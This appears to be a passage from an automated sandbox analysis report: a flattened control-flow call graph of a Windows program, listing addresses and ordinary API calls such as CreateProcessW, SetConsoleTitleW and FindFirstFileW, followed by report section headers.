20993->20995 20994->20983 20999 b1c3dd 20995->20999 20997 b0a1d6 _dup2 20996->20997 21001 b1c42d 20997->21001 21003 b0a125 2 API calls 20998->21003 20999->21000 21006 b1c3f2 SearchPathW 20999->21006 21002 b0a125 2 API calls 21000->21002 21004 b1c475 21001->21004 21005 b1c434 21001->21005 21007 b1c4af 21002->21007 21010 b1c47f 21003->21010 21009 b0a16c _close 21004->21009 21011 b0a16c _close 21005->21011 21006->20996 21006->21000 21008 b29edb 448 API calls 21007->21008 21008->20977 21009->20998 21012 b09abf _vsnwprintf 21010->21012 21011->21013 21014 b1c496 21012->21014 21013->20987 21015 b078e4 448 API calls 21014->21015 21015->20977 21017 b0e470 918 API calls 21016->21017 21018 b103a2 21017->21018 21018->18643 21020 b0dcd0 448 API calls 21019->21020 21021 b10776 21020->21021 21022 b1e9b9 21021->21022 21023 b10792 21021->21023 21024 b1089d 21021->21024 21028 b0dd20 448 API calls 21023->21028 21025 b0dcd0 448 API calls 21024->21025 21026 b108a5 21025->21026 21027 b0dcd0 448 API calls 21026->21027 21034 b107de 21027->21034 21029 b107b3 21028->21029 21030 b107bb 21029->21030 21031 b1e8bd 21029->21031 21033 b0dd20 448 API calls 21030->21033 21032 b0dc60 2 API calls 21031->21032 21035 b107d6 21032->21035 21033->21035 21034->21022 21036 b10812 21034->21036 21037 b108c5 21034->21037 21035->21034 21040 b0dc60 2 API calls 21035->21040 21038 b10875 21036->21038 21039 b10818 21036->21039 21041 b0bc30 448 API calls 21037->21041 21042 b1e8e7 21038->21042 21043 b1087f 21038->21043 22131 b10bf0 21039->22131 21040->21034 21045 b108d2 wcstol 21041->21045 21049 b10060 5 API calls 21042->21049 21046 b0bc30 448 API calls 21043->21046 22246 b0a7d5 21045->22246 21048 b1088c 21046->21048 22195 b06e57 21048->22195 21053 b1e8fd GetFullPathNameW 21049->21053 21050 b108ec wcstol 21051 b0a7d5 21050->21051 21054 b10906 wcstol 21051->21054 21055 b1e915 21053->21055 21066 b10922 21054->21066 21057 b0dcd0 448 API calls 21055->21057 21059 b078e4 448 API calls 21055->21059 21061 b1e942 GetFullPathNameW 21055->21061 21064 b1e95d 21055->21064 21056 b10822 21056->21022 21056->21056 21058 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21056->21058 21057->21055 21060 b10871 21058->21060 21059->21055 21060->18643 21061->21055 21062 b298b5 453 API calls 21062->21066 21063 b09abf _vsnwprintf 21063->21066 21065 b0bc30 448 API calls 21064->21065 21067 b1e99d 21065->21067 21066->21042 21066->21062 21066->21063 21070 b1198f 3 API calls 21066->21070 22248 b10bbb 21066->22248 22257 b23e66 21067->22257 21070->21066 21073 b0eda4 21071->21073 21074 b0e5d8 21071->21074 21072 b0edb7 _wcsicmp 21072->21073 21072->21074 21073->21072 21073->21074 21074->18630 21074->18645 21076 b12090 21075->21076 21077 b0dcd0 448 API calls 21076->21077 21078 b120a9 21077->21078 21079 b0b1b0 448 API calls 21078->21079 21104 b0e613 21078->21104 21080 b120ba 21079->21080 21081 b0f410 464 API calls 21080->21081 21080->21104 21082 b120d2 21081->21082 21083 b120d9 GetConsoleTitleW 21082->21083 21084 b1212f 21082->21084 21087 b0ad26 450 API calls 21083->21087 21085 b12134 GetConsoleTitleW 21084->21085 21086 b1217a 21084->21086 21088 b0ad26 450 API calls 21085->21088 21089 b12183 21086->21089 21090 b1f23f 21086->21090 21091 b120f2 21087->21091 21093 b1214d 21088->21093 21096 b1f24d 21089->21096 21097 b1219f 21089->21097 21089->21104 21092 b08bc7 448 API calls 21090->21092 22311 b09458 21091->22311 21092->21104 21095 b11a47 916 API calls 21093->21095 21101 b12164 21095->21101 21100 b078e4 448 API calls 21096->21100 21102 b078e4 448 API calls 21097->21102 21098 b12107 22370 b121b5 21098->22370 21100->21104 22373 b121c1 21101->22373 21102->21104 21104->18643 21106 b15833 21105->21106 21107 b15807 21105->21107 21106->18641 21108 b15813 _setjmp3 21107->21108 21108->21106 21109 b15825 21108->21109 22474 b156c4 21109->22474 21112 b0e9b2 21111->21112 21117 b0ea65 21111->21117 21113 b0e3f0 17 API calls 21112->21113 21121 b0e9c3 21113->21121 21114 b0eb41 21124 b0eb7e iswspace 21114->21124 21125 b0eac3 21114->21125 21126 b1dd3f 21114->21126 21128 b0a62f wcschr 21114->21128 21115 b0ea3d 21115->21117 21118 b0ebf0 GetFileAttributesW 21115->21118 21119 b0ec1e 21115->21119 21116 b0e9f6 wcschr 21116->21115 21116->21121 21122 b0ea7e _wcsicmp 21117->21122 21129 b0ea99 21117->21129 21123 b0ebfc 21118->21123 21119->21118 21120 b0ea0e wcschr 21120->21121 21121->21114 21121->21115 21121->21116 21121->21117 21121->21120 21122->21117 21123->21117 21124->21114 21124->21125 21125->21126 21127 b0eaf7 21125->21127 21134 b0dcd0 448 API calls 21126->21134 21130 b0eb05 ??_V@YAXPAX 21127->21130 21131 b0eb0f 21127->21131 21128->21114 21129->21125 21129->21126 21133 b0ed90 _wcsicmp 21129->21133 21130->21131 21132 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21131->21132 21135 b0ae12 21132->21135 21133->21114 21136 b1dd80 21134->21136 21135->20876 21135->20877 21137 b29922 448 API calls 21136->21137 21139 b1dd9e 21136->21139 21138 b1dd91 longjmp 21137->21138 21138->21139 21141 b0b1c9 21140->21141 21142 b0dcd0 448 API calls 21141->21142 21143 b0af78 21142->21143 21143->20906 21147 b0ad26 21143->21147 21261 b05ea3 memset 21144->21261 21148 b0ad40 21147->21148 21149 b0ad37 21147->21149 21148->20906 21149->21148 21150 b0dcd0 448 API calls 21149->21150 21151 b1cb7b 21150->21151 21151->21148 21152 b1cb85 GetConsoleTitleW 21151->21152 21152->21148 21153 b1cb9b 21152->21153 21154 b0dd20 448 API calls 21153->21154 21158 b1cbcd 21154->21158 21155 b1cc33 21156 b0dc60 2 API calls 21155->21156 21156->21148 21157 b1cc2c SetConsoleTitleW 21157->21155 21158->21155 21158->21157 21327 b09cc0 21159->21327 21163 b0aa66 21162->21163 21164 b1c9eb 21162->21164 21534 b0aa75 21163->21534 21166 b0aa75 489 API calls 21164->21166 21167 b0aa6b 21166->21167 21167->20928 21167->21167 21169 b0afdd 21168->21169 21170 b0b185 21168->21170 21169->20899 21170->21169 21171 b1ccfa SetConsoleTitleW 21170->21171 21171->21169 21173 b0c709 21172->21173 21218 b0c7ae 21172->21218 21173->21218 21714 b0b3c1 21173->21714 21174 b11cb1 450 API calls 21174->21218 21177 b298b5 453 API calls 21177->21218 21178 b078e4 448 API calls 21178->21218 21179 b0e272 453 API calls 21183 b24191 448 API calls 21183->21218 21186 b0c8b3 _get_osfhandle SetFilePointer 21188 b0c8da _get_osfhandle GetFileType 21186->21188 21186->21218 21192 b0c901 SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21188->21192 21188->21218 21190 b0c799 21194 b0a16c _close 21190->21194 21191 b0caa2 21196 b1d3fc 21191->21196 21199 b0cabd _get_osfhandle SetFilePointer 21191->21199 21192->21218 21193 b1d162 memcmp 21193->21218 21195 b0ca81 21194->21195 21197 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21195->21197 21198 b11cb1 450 API calls 21196->21198 21200 b0ca90 21197->21200 21201 b1d409 21198->21201 21199->20920 21200->20920 21204 b078e4 448 API calls 21201->21204 21202 b16c78 4 API calls 21202->21218 21203 b0c808 MultiByteToWideChar 21203->21218 21205 b1d427 21204->21205 21206 b0c7b8 SetFilePointer 21206->21218 21207 b1d1ce AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21207->21218 21208 b0c86f wcschr 21208->21218 21209 b0ca03 iswspace 21210 b0ca1e wcschr 21209->21210 21209->21218 21210->21218 21211 b0caeb wcschr 21213 b1d2b3 _get_osfhandle SetFilePointer 21211->21213 21211->21218 21212 b0ca49 wcschr 21212->21218 21214 b0cb10 iswspace 21213->21214 21213->21218 21215 b0cb25 wcschr 21214->21215 21214->21218 21215->21218 21216 b1d322 _get_osfhandle SetFilePointer 21216->21218 21217 b1d302 WideCharToMultiByte 21217->21216 21218->21174 21218->21177 21218->21178 21218->21183 21218->21186 21218->21188 21218->21190 21218->21191 21218->21193 21218->21202 21218->21203 21218->21206 21218->21207 21218->21208 21218->21209 21218->21210 21218->21211 21218->21212 21218->21213 21218->21214 21218->21215 21218->21216 21218->21217 21219 b0cb50 iswspace 21218->21219 21220 b0cb80 wcschr 21218->21220 21221 b0cb65 wcschr 21218->21221 21223 b0cbc9 _wcsicmp 21218->21223 21224 b1d3d3 WideCharToMultiByte 21218->21224 21219->21218 21219->21221 21222 b0cb96 wcschr 21220->21222 21220->21223 21221->21218 21222->21218 21222->21223 21223->21218 21224->21218 21723 b09e09 21225->21723 21228 b09de1 21231 b09df7 21228->21231 21233 b09950 448 API calls 21228->21233 21229 b1c2b9 21230 b063bd 448 API calls 21229->21230 21232 b1c2d1 21230->21232 21231->20928 21232->21231 21737 b29fcf _get_osfhandle GetFileType 21232->21737 21233->21231 21235 b1c2e5 21236 b0dd98 6 API calls 21235->21236 21238 b1c2e9 21235->21238 21236->21238 21237 b078e4 448 API calls 21239 b1c316 21237->21239 21238->21231 21238->21237 21239->21239 21241 b0e3f0 17 API calls 21240->21241 21242 b07fa0 21241->21242 21243 b08001 21242->21243 21244 b07fa4 GetDriveTypeW 21242->21244 21245 b08013 21243->21245 21246 b0800b ??_V@YAXPAX 21243->21246 21247 b07fcf 21244->21247 21248 b1b033 21244->21248 21249 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21245->21249 21246->21245 21247->21243 21251 b07fe0 GetVolumeInformationW 21247->21251 21248->21245 21250 b1b05a ??_V@YAXPAX 21248->21250 21252 b08022 21249->21252 21250->21245 21251->21243 21253 b1b040 GetLastError 21251->21253 21252->20863 21252->20884 21253->21243 21253->21248 21255 b12200 21254->21255 21256 b12229 21255->21256 21257 b12081 918 API calls 21255->21257 21256->20882 21257->21256 21738 b126dc memset 21258->21738 21262 b0e3f0 17 API calls 21261->21262 21263 b05f21 21262->21263 21264 b19d0f 21263->21264 21265 b19d02 21263->21265 21266 b08e9e 448 API calls 21263->21266 21264->21265 21269 b19d1f 21264->21269 21267 b078e4 448 API calls 21265->21267 21268 b05f45 21266->21268 21328 b09cd3 21327->21328 21329 b09780 21327->21329 21330 b0dcd0 448 API calls 21328->21330 21329->20928 21331 b09cdd 21330->21331 21331->21329 21332 b0a62f wcschr 21331->21332 21333 b09cf4 21332->21333 21535 b1ca49 21534->21535 21538 b0aa90 21534->21538 21536 b0bc30 448 API calls 21535->21536 21554 b1ca70 21535->21554 21628 b25166 21535->21628 21536->21535 21538->21535 21539 b0aacb _wcsnicmp 21538->21539 21540 b0ab3d 21539->21540 21541 b0aadf _wcsnicmp 21539->21541 21559 b13326 21540->21559 21542 b1c9fd 21541->21542 21548 b0aaf7 21541->21548 21591 b253aa 21542->21591 21546 b0ab0f 21550 b0ab1b wcschr 21546->21550 21558 b1cad1 21546->21558 21547 b078e4 448 API calls 21551 b1cb08 21547->21551 21548->21546 21549 b1ca2d wcsrchr 21548->21549 21548->21558 21549->21546 21552 b0ab47 21550->21552 21553 b0ab29 21550->21553 21557 b10060 5 API calls 21554->21557 21554->21558 21557->21558 21558->21547 21558->21558 21560 b133ab 21559->21560 21561 b1333b 21559->21561 21562 b078e4 448 API calls 21560->21562 21561->21560 21563 b10060 5 API calls 21561->21563 21592 b0acb0 448 API calls 21591->21592 21593 b253d5 21592->21593 21629 b2516f 21628->21629 21633 b25190 21628->21633 21713 b1727b __iob_func 21629->21713 21631 b25180 fprintf 21631->21535 21632 b251dd 21632->21535 21633->21632 21634 b09950 448 API calls 21633->21634 21634->21633 21713->21631 21715 b0ab7f 2 API calls 21714->21715 21716 b0b3d3 21715->21716 21717 b0ab7f 2 API calls 21716->21717 21721 b0b3eb 21716->21721 21717->21721 21718 b0b3f6 wcschr 21719 b0b408 wcschr 21718->21719 21720 b0b440 21718->21720 21719->21720 21719->21721 21720->21179 21721->21718 21721->21719 21721->21720 21722 b0a62f wcschr 21721->21722 21722->21721 21724 b09e14 21723->21724 21725 b09dd5 21723->21725 21726 b09e8e iswspace 21724->21726 21725->21228 21725->21229 21729 b09e19 21726->21729 21727 b09e27 iswspace 21728 b09e40 21727->21728 21727->21729 21730 b09e8e iswspace 21728->21730 21729->21725 21729->21727 21729->21728 21731 b09e47 21730->21731 21731->21725 21732 b09e62 21731->21732 21733 b1c31b _wcsnicmp 21731->21733 21734 b09e71 _wcsnicmp 21732->21734 21735 b09e67 21732->21735 21733->21725 21733->21735 21734->21725 21734->21735 21735->21725 21736 b078e4 448 API calls 21735->21736 21736->21725 21737->21235 21739 b0e3f0 17 API calls 21738->21739 21740 b127be 21739->21740 21741 b128f8 21740->21741 21742 b127c8 memset GetEnvironmentVariableW 21740->21742 21743 b12912 21741->21743 21744 b1290a ??_V@YAXPAX 21741->21744 21745 b0e3f0 17 API calls 21742->21745 21746 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21743->21746 21744->21743 21747 b12830 21745->21747 21749 b12925 21746->21749 21748 b128e2 21747->21748 21750 b1284a GetEnvironmentVariableW 21747->21750 21748->21741 21751 b1f431 ??_V@YAXPAX 21748->21751 21749->20928 21752 b1f3b2 21750->21752 21753 b12865 21750->21753 21751->21741 21755 b09144 448 API calls 21752->21755 21769 b09144 21753->21769 21756 b1f3cd 21755->21756 21756->21753 21757 b078e4 448 API calls 21756->21757 21757->21753 21758 b12872 21758->21748 21770 b0bc30 446 API calls 21769->21770 21776 b09172 21770->21776 21771 b1b904 21771->21758 21771->21771 21772 b0926f 21775 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21772->21775 21773 b091a6 towupper 21773->21776 21774 b1bb35 21780 b0dcd0 446 API calls 21774->21780 21778 b0927e 21775->21778 21776->21771 21776->21772 21776->21773 21776->21774 21777 b10060 5 API calls 21776->21777 21779 b1bad3 21776->21779 21782 b1054b 446 API calls 21776->21782 21785 b1669f 446 API calls 21776->21785 21787 b1ba93 21776->21787 21789 b092c2 21776->21789 21792 b2a37a 446 API calls 21776->21792 21777->21776 21778->21758 21784 b063bd 446 API calls 21779->21784 21781 b1bb3d 21780->21781 21782->21776 21784->21772 21785->21776 21791 b2a53d 446 API calls 21787->21791 21794 b078e4 446 API calls 21789->21794 21791->21779 21792->21776 21795 b1ba8b 21794->21795 21795->21758 22106 b0e7a2 22105->22106 22107 b0e7c6 22105->22107 22108 b0e7ab wcschr 22106->22108 22110 b0e697 22106->22110 22107->22110 22112 b0dc60 2 API calls 22107->22112 22109 b0e7f4 22108->22109 22108->22110 22111 b0dcd0 448 API calls 22109->22111 22110->20935 22110->20941 22117 b0e7fe 22111->22117 22112->22110 22113 b0e83f 22113->22110 22115 b0dc60 2 API calls 22113->22115 22114 b0bf70 456 API calls 22114->22117 22115->22110 22116 b0dd20 448 API calls 22116->22113 22117->22110 22117->22113 22117->22114 22118 b0e8f7 22117->22118 22118->22110 22118->22113 22118->22116 22120 b11615 lstrcmpiW 22119->22120 22121 b11606 lstrcmpW 22119->22121 22122 b1160c 22120->22122 22121->22122 22122->20958 22124 b12998 22123->22124 22125 b12a09 lstrcmpiW 22124->22125 22126 b129ff lstrcmpW 22124->22126 22127 b129a0 22124->22127 22125->22127 22126->22127 22127->20958 22129 b0a1bd 22128->22129 22129->20983 22130->20983 22132 b1054b 448 API calls 22131->22132 22138 b10c22 22132->22138 22133 b10d9e 22134 b0bc30 448 API calls 22133->22134 22181 b10e27 22133->22181 22134->22181 22135 b110ae 22135->21056 22136 b11436 CreateFileW 22139 b1ed11 22136->22139 22140 b11457 SetFilePointer SetFilePointer 22136->22140 22137 b0dd20 448 API calls 22141 b10d6a 22137->22141 22138->22133 22142 b10c93 _wcsnicmp 22138->22142 22169 b0dc60 2 API calls 22138->22169 22180 b1054b 448 API calls 22138->22180 22138->22181 22183 b1129a wcstol 22138->22183 22184 b1118f wcstol 22138->22184 22186 b10d4a 22138->22186 22146 b078e4 448 API calls 22139->22146 22144 b0dcd0 448 API calls 22140->22144 22145 b0dd20 448 API calls 22141->22145 22147 b10cac _wcsnicmp 22142->22147 22142->22181 22143 b298b5 453 API calls 22143->22181 22144->22181 22148 b10d81 22145->22148 22149 b1ed1e GetLastError 22146->22149 22150 b10cc7 _wcsnicmp 22147->22150 22156 b1ebf5 22147->22156 22148->22133 22154 b1ec27 22148->22154 22149->22135 22151 b10ce2 _wcsnicmp 22150->22151 22150->22181 22151->22138 22155 b11131 _wcsnicmp 22151->22155 22152 b1ed00 CloseHandle 22152->22135 22153 b1148a ReadFile CloseHandle 22153->22181 22157 b078e4 448 API calls 22154->22157 22164 b11563 wcstol 22155->22164 22165 b1114c _wcsnicmp 22155->22165 22160 b078e4 448 API calls 22156->22160 22161 b1ec33 22157->22161 22158 b0dd20 448 API calls 22158->22181 22159 b112d3 _wpopen 22166 b1ece5 22159->22166 22167 b112ff feof 22159->22167 22160->22135 22168 b29922 448 API calls 22161->22168 22162 b1198f 3 API calls 22162->22181 22163 b0dc60 GetProcessHeap RtlFreeHeap 22163->22181 22164->22156 22164->22181 22165->22138 22165->22156 22173 b078e4 448 API calls 22166->22173 22171 b11313 ferror 22167->22171 22172 b1136e _pclose 22167->22172 22176 b1ec3b longjmp 22168->22176 22169->22138 22170 b11546 22177 b0dc60 2 API calls 22170->22177 22171->22172 22171->22181 22179 b0dd20 448 API calls 22172->22179 22178 b1ecf2 GetLastError 22173->22178 22174 b1ecb3 _pclose 22174->22135 22175 b1134d fgets 22175->22172 22175->22181 22176->22135 22177->22174 22178->22135 22179->22181 22180->22138 22181->22135 22181->22136 22181->22143 22181->22152 22181->22153 22181->22158 22181->22159 22181->22162 22181->22163 22181->22164 22181->22170 22181->22172 22181->22174 22181->22175 22181->22181 22182 b113db MultiByteToWideChar 22181->22182 22181->22183 22185 b114e7 feof 22181->22185 22187 b10fc8 wcschr 22181->22187 22188 b0dcd0 448 API calls 22181->22188 22189 b10f0a wcschr 22181->22189 22190 b1ecc9 22181->22190 22191 b10bbb 485 API calls 22181->22191 22193 b113b7 memmove 22181->22193 22194 b10f90 wcschr 22181->22194 22182->22181 22183->22156 22183->22181 22184->22138 22184->22156 22185->22171 22185->22181 22186->22133 22186->22137 22187->22181 22188->22181 22189->22181 22192 b078e4 448 API calls 22190->22192 22191->22181 22192->22135 22193->22181 22194->22181 22196 b06f39 22195->22196 22208 b06ea7 22195->22208 22197 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 22196->22197 22198 b06f4e 22197->22198 22198->21056 22199 b1a746 22200 b298b5 453 API calls 22199->22200 22201 b0701a 22200->22201 22206 b0dcd0 448 API calls 22201->22206 22214 b15851 2 API calls 22201->22214 22216 b0dc60 2 API calls 22201->22216 22217 b298b5 453 API calls 22201->22217 22218 b1a7fa 22201->22218 22219 b1198f 3 API calls 22201->22219 22220 b08b4d 2 API calls 22201->22220 22221 b1a806 22201->22221 22222 b0725d 22201->22222 22235 b0dd20 448 API calls 22201->22235 22241 b10bbb 485 API calls 22201->22241 22202 b06f5d 22203 b10060 5 API calls 22202->22203 22205 b06f64 22203->22205 22204 b0a62f wcschr 22204->22208 22207 b0acb0 448 API calls 22205->22207 22206->22201 22209 b06f6b 22207->22209 22208->22196 22208->22199 22208->22202 22208->22204 22210 b10bbb 485 API calls 22208->22210 22213 b1198f 3 API calls 22208->22213 22211 b1589a 10 API calls 22209->22211 22210->22208 22212 b06fa6 22211->22212 22212->22201 22215 b08f21 448 API calls 22212->22215 22213->22208 22214->22201 22225 b06fbf 22215->22225 22216->22201 22217->22201 22223 b0dc60 2 API calls 22218->22223 22219->22201 22220->22201 22224 b29922 448 API calls 22221->22224 22229 b1a851 22222->22229 22230 b07271 22222->22230 22223->22221 22226 b1a80b longjmp 22224->22226 22225->22201 22225->22221 22227 b0dcd0 448 API calls 22225->22227 22228 b1a819 22226->22228 22227->22201 22280 b121d2 22228->22280 22231 b29a7d 448 API calls 22229->22231 22233 b08bc7 448 API calls 22230->22233 22236 b1a85c 22231->22236 22234 b0727b GetProcessHeap RtlFreeHeap 22233->22234 22238 b072ee 8 API calls 22234->22238 22235->22201 22237 b1a824 22240 b11e70 448 API calls 22237->22240 22244 b1a835 exit 22237->22244 22239 b07294 22238->22239 22279 b072c6 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 22239->22279 22240->22237 22241->22201 22243 b0729c GetProcessHeap RtlFreeHeap 22245 b072bc 22243->22245 22244->22222 22245->21056 22247 b0a7db 22246->22247 22247->21050 22247->22247 22284 b0b45a 22248->22284 22250 b10bd6 22250->21066 22252 b2769e 459 API calls 22253 b1ebcc 22252->22253 22254 b23b4e 448 API calls 22253->22254 22255 b1ebd5 22254->22255 22256 b09950 448 API calls 22255->22256 22256->22250 22261 b23ea6 22257->22261 22258 b2416f 22259 b16b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 22258->22259 22260 b2418b 22259->22260 22260->21056 22261->22258 22262 b0dcd0 448 API calls 22261->22262 22267 b23ef9 22262->22267 22263 b06e57 499 API calls 22264 b23f70 22263->22264 22265 b0dc60 2 API calls 22264->22265 22266 b23f7b 22265->22266 22268 b0dcd0 448 API calls 22266->22268 22267->22258 22267->22263 22269 b23fa4 22268->22269 22269->22258 22270 b23fe2 FindFirstFileW 22269->22270 22271 b24164 22270->22271 22277 b24006 22270->22277 22273 b0dc60 2 API calls 22271->22273 22272 b2413c FindNextFileW 22274 b24153 FindClose 22272->22274 22272->22277 22273->22258 22274->22271 22276 b0dd20 448 API calls 22276->22277 22277->22272 22277->22274 22277->22276 22278 b23e66 499 API calls 22277->22278 22278->22277 22279->22243 22281 b121d6 22280->22281 22282 b121df 22280->22282 22281->22282 22283 b1f25c SetConsoleTitleW 22281->22283 22282->22237 22283->22237 22296 b0b46c 22284->22296 22285 b0b4bf 22285->22250 22285->22252 22286 b0b484 22286->22285 22302 b0b5b0 22286->22302 22287 b0b45a 474 API calls 22290 b0b4d2 22287->22290 22288 b0b53c 22288->22285 22288->22286 22292 b0b4c8 22288->22292 22290->22285 22294 b0b45a 474 API calls 22290->22294 22292->22285 22292->22287 22293 b0b5b0 474 API calls 22293->22296 22299 b0b4e4 22294->22299 22295 b0b5b0 474 API calls 22298 b0b4a5 22295->22298 22296->22285 22296->22286 22296->22288 22296->22292 22296->22293 22297 b0b45a 474 API calls 22296->22297 22297->22296 22298->22285 22300 b0b5b0 474 API calls 22298->22300 22299->22285 22301 b0b5b0 474 API calls 22299->22301 22300->22298 22301->22299 22303 b0b5c8 22302->22303 22310 b0b490 22302->22310 22304 b0dcd0 448 API calls 22303->22304 22303->22310 22309 b0b5eb 22304->22309 22305 b0b631 22306 b0dd20 448 API calls 22305->22306 22305->22310 22306->22310 22307 b0ee03 474 API calls 22307->22309 22308 b101f5 wcsrchr 22308->22309 22309->22305 22309->22307 22309->22308 22309->22310 22310->22285 22310->22295 22376 b17d90 22311->22376 22313 b09467 InitializeProcThreadAttributeList 22314 b1bdf1 GetLastError 22313->22314 22315 b094b8 UpdateProcThreadAttribute 22313->22315 22388 b25c54 22314->22388 22317 b094e7 memset memset GetStartupInfoW 22315->22317 22318 b1be0d GetLastError 22315->22318 22321 b11d90 451 API calls 22317->22321 22319 b25c54 448 API calls 22318->22319 22323 b1be1f DeleteProcThreadAttributeList 22319->22323 22320 b1be03 22320->22318 22322 b09579 22321->22322 22325 b0acb0 448 API calls 22322->22325 22324 b1be5c 22323->22324 22324->21098 22327 b09589 22325->22327 22326 b1be49 _local_unwind4 22326->22324 22327->22326 22328 b101f5 wcsrchr 22327->22328 22329 b095c6 22327->22329 22330 b095ae 22328->22330 22377 b08235 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22329->22377 22330->22329 22331 b095b2 lstrcmpW 22330->22331 22331->22329 22333 b1be83 22331->22333 22393 b250d8 22333->22393 22334 b095cb 22336 b095d8 22334->22336 22339 b09711 CreateProcessAsUserW 22334->22339 22337 b1bec4 22336->22337 22338 b095e5 CreateProcessW 22336->22338 22341 b1bece GetLastError 22337->22341 22340 b09608 22338->22340 22339->22340 22340->22341 22342 b09612 CloseHandle 22340->22342 22345 b0963a 22341->22345 22344 b0a976 8 API calls 22342->22344 22344->22345 22371 b121d2 SetConsoleTitleW 22370->22371 22372 b121c0 22371->22372 22372->21104 22374 b121d2 SetConsoleTitleW 22373->22374 22375 b121cc 22374->22375 22375->21104 22376->22313 22377->22334 22392 b25c6a 22388->22392 22389 b25d93 22389->22320 22390 b078e4 448 API calls 22391 b25dfe 22390->22391 22391->22320 22392->22389 22392->22390 22394 b11d90 451 API calls 22393->22394 22475 b156e2 22474->22475 22476 b213ca 22474->22476 22478 b156ef 22475->22478 22482 b21303 22475->22482 22483 b21256 22475->22483 22477 b2155c 22476->22477 22479 b2126a longjmp 22476->22479 22485 b213e2 22476->22485 22486 b214e7 22476->22486 22481 b15726 449 API calls 22477->22481 22535 b15726 22478->22535 22484 b21277 22479->22484 22520 b212fb 22481->22520 22491 b15726 449 API calls 22482->22491 22483->22478 22483->22484 22496 b21264 22483->22496 22488 b15726 449 API calls 22484->22488 22489 b21433 22485->22489 22490 b213e7 22485->22490 22499 b15726 449 API calls 22486->22499 22487 b156fe 22492 b15711 22487->22492 22500 b15726 449 API calls 22487->22500 22497 b21288 22488->22497 22495 b157c9 449 API calls 22489->22495 22490->22479 22505 b213fc 22490->22505 22498 b21316 22491->22498 22547 b157c9 22492->22547 22494 b156c4 449 API calls 22501 b21583 22494->22501 22522 b2143b 22495->22522 22496->22479 22496->22489 22509 b212c7 22497->22509 22515 b15726 449 API calls 22497->22515 22502 b2136e 22498->22502 22521 b15726 449 API calls 22498->22521 22526 b21326 22498->22526 22499->22477 22500->22492 22501->21106 22503 b15726 449 API calls 22502->22503 22508 b21380 22503->22508 22504 b156c4 449 API calls 22511 b214c2 22504->22511 22506 b15726 449 API calls 22505->22506 22512 b1571d 22506->22512 22507 b21471 22507->22504 22514 b15726 449 API calls 22508->22514 22510 b156c4 449 API calls 22509->22510 22516 b212d6 22510->22516 22517 b15726 449 API calls 22511->22517 22512->21106 22513 b15726 449 API calls 22513->22502 22518 b21390 22514->22518 22515->22509 22519 b156c4 449 API calls 22516->22519 22517->22520 22523 b15726 449 API calls 22518->22523 22525 b212e3 22519->22525 22520->22494 22520->22512 22521->22526 22522->22507 22527 b2147a 22522->22527 22528 b2145c 22522->22528 22524 b2139f 22523->22524 22530 b15726 449 API calls 22524->22530 22525->22512 22532 b15726 449 API calls 22525->22532 22526->22502 22526->22513 22529 b15726 449 API calls 22527->22529 22528->22507 22533 b15726 449 API calls 22528->22533 22529->22507 22531 b213b0 22530->22531 22534 b15726 449 API calls 22531->22534 22532->22520 22533->22507 22534->22520 22536 b1573f 22535->22536 22536->22536 22537 b078e4 448 API calls 22536->22537 22542 b15781 22536->22542 22538 b2159e longjmp 22537->22538 22539 b215ae 22538->22539 22540 b15726 448 API calls 22539->22540 22541 b215c9 22540->22541 22543 b15726 448 API calls 22541->22543 22542->22487 22544 b215f4 22543->22544 22545 b15726 448 API calls 22544->22545 22546 b21603 22545->22546 22546->22487 22548 b157e4 22547->22548 22549 b215ae 22547->22549 22548->22512 22550 b15726 449 API calls 22549->22550 22551 b215c9 22550->22551 22552 b15726 449 API calls 22551->22552 22553 b215f4 22552->22553 22554 b15726 449 API calls 22553->22554 22555 b21603 22554->22555 22555->22512 22557 b11eb2 22556->22557 22558 b1f110 22557->22558 22561 b11eef 22557->22561 22563 b11ebc 22557->22563 22559 b172ef ApiSetQueryApiSetPresence 22558->22559 22560 b1f12e 22559->22560 22560->18675 22562 b1f15b realloc 22561->22562 22561->22563 22562->22563 22563->18675 22565 b16474 22564->22565 22566 b16464 NtOpenProcessToken 22564->22566 22570 b162fa 22565->22570 22574 b16500 NtQueryInformationToken 22565->22574 22566->22565 22569 b164a8 22569->22570 22571 b164bc NtClose 22569->22571 22570->18687 22570->18688 22571->22570 22573->18699 22575 b1648a 22574->22575 22576 b16534 22574->22576 22575->22569 22578 b164ca NtQueryInformationToken 22575->22578 22576->22575 22577 b22018 NtQueryInformationToken 22576->22577 22577->22575 22579 b164f3 22578->22579 22579->22569

                                                                            Executed Functions

                                                                            Function 00B08572 Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 392COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
